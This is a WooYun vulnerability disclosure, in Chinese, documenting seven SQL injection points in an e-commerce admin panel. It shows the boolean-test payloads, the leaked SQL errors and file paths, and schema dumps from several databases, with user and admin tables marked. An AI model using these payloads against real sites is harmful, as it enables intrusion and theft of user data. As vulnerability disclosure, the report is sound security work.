WooYun.org

1、注入点一：
号码列表处，输入1'
返回错误，可以看到绝对路径了。
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/site/**.**.**.**/fun.php 
on line 40
 select DISTINCT a.*,b.status as order_status,b.orderid,b.ordernum from tel_number as a left join order_info as b on 
a.number=b.step2 where 1 and a.type_id=1 and number like '%1'%' order by a.id desc limit 0,30 You have an error in your SQL 
syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' order by a.id desc 
limit 0,30' at line 1
输入1%' and 12=12 and '%'='返回正常结果
输入1%' and 12=11 and '%'='返回异常结果
判断存在注入

2、注入点二：
品牌分类列表处
http://**.**.**.**/admin/class/editclass.php?classid=686'
返回错误信息
Could not query tableYou have an error in your SQL syntax; check the manual that corresponds to your MySQL server version 
for the right syntax to use near ''' at line 1
http://**.**.**.**/admin/class/editclass.php?classid=686 and 1=1
返回正常结果
http://**.**.**.**/admin/class/editclass.php?classid=686 and 1=2
返回错误
判断存在注入
http://**.**.**.**/admin/class/editgrade.php?classid=703'
http://**.**.**.**/admin/class/editclass.php?classid=700'
同样返回错误信息
Could not query tableYou have an error in your SQL syntax; check the manual that corresponds to your MySQL server version 
for the right syntax to use near ''' at line 1
http://**.**.**.**/admin/class/gaddp.php?classid=703 and 1=1
http://**.**.**.**/admin/class/gaddp.php?classid=703 and 1=2
两者界面勾选不一样
也就是classid该参数被用到的地方都有注入

3、注入点三
参数列表中的“展开查看此分类下的属性”随便选择“颜色”后面的编辑，得到地址
http://**.**.**.**/admin/class/editattribute.php?acid=327'
返回错误信息
Could not query tableYou have an error in your SQL syntax; check the manual that corresponds to your MySQL server version 
for the right syntax to use near ''' at line 1

4、注入点四：
产品列表处输入1'
返回错误
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/site/**.**.**.**/fun.php 
on line 40
 Could not query tableYou have an error in your SQL syntax; check the manual that corresponds to your MySQL server version 
for the right syntax to use near '%' order by gid desc limit 0,20' at line 1
输入1%' and 12=12 and '%'='返回正常结果
输入1%' and 12=11 and '%'='返回异常结果
判断存在注入

5、注入点五：
查看订单处输入1'
返回错误信息
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/site/**.**.**.**/fun.php 
on line 40
 select * from order_info where 1 and ordernum='1'' order by orderid desc limit 0,20 You have an error in your SQL syntax; 
check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' order by orderid desc 
limit 0,20' at line 1
输入51871413728971' and '1'='1返回正常订单结果
输入51871413728971' and '1'='2返回异常结果（订单为空）
判断存在注入

6、注入点六：
会员列表处输入1'
返回错误信息
Could not query tableYou have an error in your SQL syntax; check the manual that corresponds to your MySQL server version 
for the right syntax to use near '%' order by userid desc limit 0,20' at line 1
输入1%' and 12=12 and '%'='返回正常结果
输入1%' and 12=11 and '%'='返回异常结果
判断存在注入

7、注入点7：
广告管理列表处
http://**.**.**.**/admin/ad/list.php?l=100'
返回错误信息
select * from ad_info where location=100' order by sort You have an error in your SQL syntax; check the manual that 
corresponds to your MySQL server version for the right syntax to use near '' order by sort' at line 1
http://**.**.**.**/admin/ad/list.php?l=100 and 1=1	返回正常
http://**.**.**.**/admin/ad/list.php?l=100 and 1=2	返回异常
判断存在注入

Database: dspam
+----------------------+---------+
| Table                | Entries |
+----------------------+---------+
| dspam_token_data     | 4649647 |		几百万数据信息，不知道是什么，没看了！~~~
| dspam_signature_data | 225707  |
| dspam_preferences    | 33      |
| dspam_stats          | 5       |
| dspam_virtual_uids   | 5       |
+----------------------+---------+
Database: ego10000
+-----------------------------------+---------+
| Table                             | Entries |
+-----------------------------------+---------+
| userinfo                          | 2938    |
| order_detail_info                 | 2302    |
| order_info                        | 2011    |
| goods_taocan_value                | 1365    |
| goods_taocan_attr                 | 1274    |
| search_log                        | 1212    |
| notice                            | 1148    |
| usercent                          | 1147    |
| gift_order                        | 1141    |
| attribute_value_info              | 1082    |
| goods_more_info                   | 960     |
| ask_goods_info                    | 689     |
| goods_image_info                  | 685     |
| telnumber                         | 566     |
| order_network                     | 430     |
| goods_mutuality_info              | 371     |
| shop_basket                       | 343     |
| goods_info                        | 270     |
| goods_taocan                      | 147     |
| activityinfo                      | 95      |
| tel_number                        | 77      |
| rcmdgoods                         | 73      |
| create_html                       | 68      |
| adminmenu                         | 67      |
| news                              | 55      |
| class_info                        | 45      |
| gp_class                          | 45      |
| tel_type_template_attr            | 39      |
| attribute_class_select_value_info | 36      |
| act_user_award_info               | 35      |
| repair                            | 30      |
| tel_taocan_value                  | 30      |
| ad_info                           | 22      |
| dispatch_pay_mutuality_info       | 16      |
| adminuser                         | 15      |
| dispatch_mode_info                | 13      |
| act_award_info                    | 11      |
| attribute_class_info              | 10      |
| tel_type                          | 8       |
| goods_fitting_mutuality_info      | 5       |
| tel_type_template                 | 5       |
| admingroup                        | 2       |
| gift_info                         | 2       |
+-----------------------------------+---------+
Database: extmail
+----------------+---------+
| Table          | Entries |
+----------------+---------+
| mailbox        | 42      |
| alias          | 37      |
| `domain`       | 2       |
| domain_manager | 2       |
| manager        | 2       |
+----------------+---------+
Database: hallylure
+-----------------------------------------+---------+
| Table                                   | Entries |
+-----------------------------------------+---------+
| hallylure_ucenter_memberfields          | 225937  |
| hallylure_ucenter_members               | 225937  |		二十多万用户
| hallylure_common_member_newprompt       | 225934  |
| hallylure_home_notification             | 215655  |
| hallylure_common_credit_rule_log        | 215248  |
| hallylure_common_member                 | 215104  |		同样也有二十多万用户
| hallylure_common_member_count           | 215104  |
| hallylure_common_member_field_forum     | 215104  |
| hallylure_common_member_field_home      | 215104  |
| hallylure_common_member_profile         | 215104  |
| hallylure_common_member_status          | 215104  |
| hallylure_common_onlinetime             | 198587  |
| hallylure_common_district               | 45051   |
| hallylure_forum_statlog                 | 6930    |
| hallylure_security_failedlog            | 3953    |
| hallylure_forum_post                    | 2519    |
| hallylure_forum_filter_post             | 1159    |
| hallylure_forum_attachment              | 921     |
| hallylure_common_statuser               | 614     |
| hallylure_forum_threadpartake           | 606     |
| hallylure_common_stat                   | 533     |
| hallylure_forum_thread                  | 491     |
| hallylure_forum_post_tableid            | 486     |
| hallylure_common_setting                | 433     |
| hallylure_forum_sofa                    | 356     |
| hallylure_forum_threadhot               | 182     |
| hallylure_forum_attachment_0            | 134     |
| hallylure_forum_attachment_7            | 131     |
| hallylure_forum_attachment_8            | 124     |
| hallylure_common_syscache               | 108     |
| hallylure_forum_rsscache                | 106     |
| hallylure_forum_threadimage             | 106     |
| hallylure_common_block_style            | 103     |
| hallylure_forum_modwork                 | 101     |
| hallylure_forum_attachment_5            | 99      |
| hallylure_forum_attachment_9            | 98      |
| hallylure_forum_attachment_1            | 92      |
| hallylure_forum_threadcalendar          | 86      |
| hallylure_common_smiley                 | 85      |
| hallylure_forum_attachment_3            | 84      |
| hallylure_common_admincp_perm           | 67      |
| hallylure_ucenter_pm_indexes            | 63      |
| hallylure_forum_attachment_6            | 61      |
| hallylure_forum_attachment_2            | 59      |
| hallylure_common_nav                    | 52      |
| hallylure_common_member_profile_setting | 51      |
| hallylure_ucenter_pm_members            | 48      |
| hallylure_forum_forumfield              | 47      |
| hallylure_forum_forum                   | 46      |
| hallylure_common_stylevar               | 45      |
| hallylure_common_optimizer              | 34      |
| hallylure_connect_memberbindlog         | 33      |
| hallylure_forum_attachment_4            | 33      |
| hallylure_common_credit_rule            | 32      |
| hallylure_common_member_connect         | 29      |
| hallylure_ucenter_settings              | 26      |
| hallylure_ucenter_pm_lists              | 24      |
| hallylure_common_cron                   | 20      |
| hallylure_common_usergroup              | 20      |
| hallylure_common_usergroup_field        | 20      |
| hallylure_home_click                    | 15      |
| hallylure_common_failedlogin            | 14      |
| hallylure_common_connect_guest          | 13      |
| hallylure_common_plugin                 | 12      |
| hallylure_forum_threadmod               | 12      |
| hallylure_forum_medal                   | 10      |
| hallylure_ucenter_notelist              | 9       |
| hallylure_ucenter_pm_messages_2         | 9       |
| hallylure_ucenter_pm_messages_9         | 9       |
| hallylure_ucenter_newpm                 | 8       |
| hallylure_common_admingroup             | 7       |
| hallylure_ucenter_pm_messages_3         | 7       |
| hallylure_ucenter_pm_messages_4         | 7       |
| hallylure_common_admincp_cmenu          | 6       |
| hallylure_forum_typeoption              | 6       |
| hallylure_ucenter_pm_messages_0         | 6       |
| hallylure_ucenter_pm_messages_7         | 6       |
| hallylure_common_admincp_group          | 5       |
| hallylure_common_friendlink             | 5       |
| hallylure_common_member_crime           | 5       |
| hallylure_ucenter_pm_messages_1         | 5       |
| hallylure_ucenter_pm_messages_6         | 5       |
| hallylure_ucenter_pm_messages_8         | 5       |
| hallylure_common_failedip               | 4       |
| hallylure_common_member_action_log      | 4       |
| hallylure_forum_attachment_unused       | 4       |
| hallylure_forum_bbcode                  | 4       |
| hallylure_forum_onlinelist              | 4       |
| hallylure_home_friend                   | 4       |
| hallylure_ucenter_pm_messages_5         | 4       |
| hallylure_forum_grouplevel              | 3       |
| hallylure_forum_imagetype               | 3       |
| hallylure_common_admincp_session        | 2       |
| hallylure_common_block                  | 2       |
| hallylure_common_cache                  | 2       |
| hallylure_common_template_block         | 2       |
| hallylure_common_word_type              | 2       |
| hallylure_forum_faq                     | 2       |
| hallylure_forum_hotreply_member         | 2       |
| hallylure_forum_hotreply_number         | 2       |
| hallylure_home_favorite                 | 2       |
| hallylure_home_friend_request           | 2       |
| hallylure_home_friendlog                | 2       |
| hallylure_mobile_setting                | 2       |
| hallylure_common_credit_rule_log_field  | 1       |
| hallylure_common_diy_data               | 1       |
| hallylure_common_searchindex            | 1       |
| hallylure_common_style                  | 1       |
| hallylure_common_template               | 1       |
| hallylure_forum_promotion               | 1       |
| hallylure_forum_threadprofile           | 1       |
| hallylure_forum_threadtype              | 1       |
| hallylure_home_visitor                  | 1       |
| hallylure_ucenter_admins                | 1       |
| hallylure_ucenter_applications          | 1       |
| hallylure_ucenter_failedlogins          | 1       |
+-----------------------------------------+---------+
Database: shopstit
+-----------------------------------+---------+
| Table                             | Entries |
+-----------------------------------+---------+
| attribute_value_info              | 18916   |
| shop_basket                       | 6900    |
| goods_image_info                  | 3742    |
| goods_info                        | 1993    |
| search_log                        | 1212    |
| notice                            | 1148    |
| userinfo                          | 830     |		用户
| goods_mutuality_info              | 719     |
| ask_goods_info                    | 691     |
| order_detail_info                 | 665     |
| telnumber                         | 566     |
| rcmdgoods                         | 446     |
| order_info                        | 420     |
| news                              | 418     |
| attribute_class_select_value_info | 367     |
| gp_class                          | 359     |
| attribute_class_info              | 280     |
| class_info                        | 163     |
| goods_fav                         | 100     |
| activityinfo                      | 95      |
| usercent                          | 87      |
| adminmenu                         | 79      |
| create_html                       | 68      |
| sms                               | 63      |
| act_user_award_info               | 35      |
| repair                            | 30      |
| goods_fitting_mutuality_info      | 26      |
| dispatch_pay_mutuality_info       | 17      |
| dispatch_mode_info                | 13      |
| act_award_info                    | 10      |
| adminuser                         | 8       |		管理员
| admingroup                        | 5       |
+-----------------------------------+---------+
Database: stit_v3
+-----------------------------------+---------+
| Table                             | Entries |
+-----------------------------------+---------+
| goods_taocan_attr                 | 1303    |
| goods_taocan_value                | 1289    |
| search_log                        | 1212    |
| notice                            | 1148    |
| attribute_value_info              | 1091    |
| goods_more_info                   | 1072    |
| goods_image_info                  | 793     |
| ask_goods_info                    | 689     |
| tel_number                        | 670     |
| telnumber                         | 566     |
| goods_mutuality_info              | 407     |
| goods_info                        | 298     |
| userinfo                          | 280     |		用户
| order_detail_info                 | 248     |
| gp_class                          | 214     |
| order_info                        | 195     |
| news                              | 158     |
| goods_taocan                      | 156     |
| tel_type_template_attr            | 121     |
| shop_basket                       | 114     |
| activityinfo                      | 95      |
| rcmdgoods                         | 94      |
| create_html                       | 68      |
| adminmenu                         | 64      |
| tel_taocan_value                  | 55      |
| class_info                        | 48      |
| act_user_award_info               | 35      |
| repair                            | 30      |
| attribute_class_select_value_info | 28      |
| goods_fitting_mutuality_info      | 22      |
| ad_info                           | 20      |
| order_network                     | 17      |
| tel_type_template                 | 14      |
| dispatch_pay_mutuality_info       | 13      |
| tel_type                          | 13      |
| dispatch_mode_info                | 12      |
| act_award_info                    | 11      |
| attribute_class_info              | 9       |
| adminuser                         | 5       |		管理员
| admingroup                        | 1       |
| gift_info                         | 1       |
+-----------------------------------+---------+
Database: ybzdb
+---------------------+---------+
| Table               | Entries |
+---------------------+---------+
| v9_linkage          | 3284    |
| v9_menu             | 349     |
| v9_model_field      | 103     |
| v9_guestbook        | 43      |
| v9_hits             | 33      |
| v9_search           | 33      |
| v9_position_data    | 30      |
| v9_cache            | 29      |
| v9_news             | 29      |
| v9_news_data        | 29      |
| v9_admin_role_priv  | 28      |
| v9_module           | 27      |
| v9_category_priv    | 23      |
| v9_attachment       | 19      |
| v9_category         | 17      |
| v9_page             | 11      |
| v9_poster           | 10      |
| v9_poster_space     | 10      |
| v9_urlrule          | 8       |
| v9_admin_role       | 7       |
| v9_member_group     | 7       |
| v9_type             | 7       |
| v9_position         | 6       |
| v9_model            | 5       |
| v9_sso_settings     | 5       |
| v9_biaodan_data     | 4       |
| v9_picture          | 4       |
| v9_picture_data     | 4       |
| v9_workflow         | 4       |
| v9_admin_panel      | 3       |
| v9_member_menu      | 3       |
| v9_admin            | 2       |		管理员
| v9_announce         | 2       |
| v9_attachment_index | 2       |
| v9_link             | 2       |
| v9_comment_setting  | 1       |
| v9_comment_table    | 1       |
| v9_session          | 1       |
| v9_site             | 1       |
| v9_sso_admin        | 1       |		管理员
| v9_sso_applications | 1       |
| v9_wap              | 1       |
+---------------------+---------+
Database: mysql
+---------------+---------+
| Table         | Entries |
+---------------+---------+
| help_relation | 993     |
| help_topic    | 508     |
| help_keyword  | 452     |
| help_category | 38      |
| `user`        | 9       |
| db            | 6       |
| func          | 5       |
| cgfuhc        | 2       |
| ehuyzk32      | 2       |
| ejfjxv32      | 2       |
| gjippi        | 2       |
| jtjqbr        | 2       |
| nciupb32      | 2       |
| omrnqa        | 2       |
| qpicbb        | 2       |
| ysqzut        | 2       |
| yttxfg32      | 2       |
| zcsxqm32      | 2       |
| zfdipw32      | 2       |
| abcgv         | 1       |
| abcgvmo       | 1       |
| tempEx        | 1       |
| tempExT1      | 1       |
+---------------+---------+